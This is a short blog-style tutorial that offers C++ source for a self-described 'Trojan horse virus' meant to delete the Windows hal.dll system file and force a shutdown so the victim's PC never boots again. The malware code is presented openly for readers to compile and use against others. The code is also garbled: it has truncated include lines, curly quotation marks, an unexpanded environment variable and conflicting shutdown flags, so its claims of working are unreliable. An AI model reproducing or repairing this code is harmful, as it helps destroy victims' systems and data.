Create a Powerful Trojan horse Virus of your own in C++ [Tutorial]

No comments
Create a Simple and Powerful Trojan Horse virus in C++. It deletes an essential file that need for the computer to operate well. Thus the PC will shutdown and will never Turn on (until install new Windows)
You need Dev C++, Borland Turbo C++, Visual C++ or similar to compile this code
Download Dev C++ from Here

Here is the code


#include
#include using namespace std; int main(int argc, char *argv[])
{
std::remove(”%systemroot%\\system32\\hal.dll”); //PWNAGE TIME
system(”shutdown -s -r”);
system(”PAUSE”);
return EXIT_SUCCESS;
}

No comments :

Post a Comment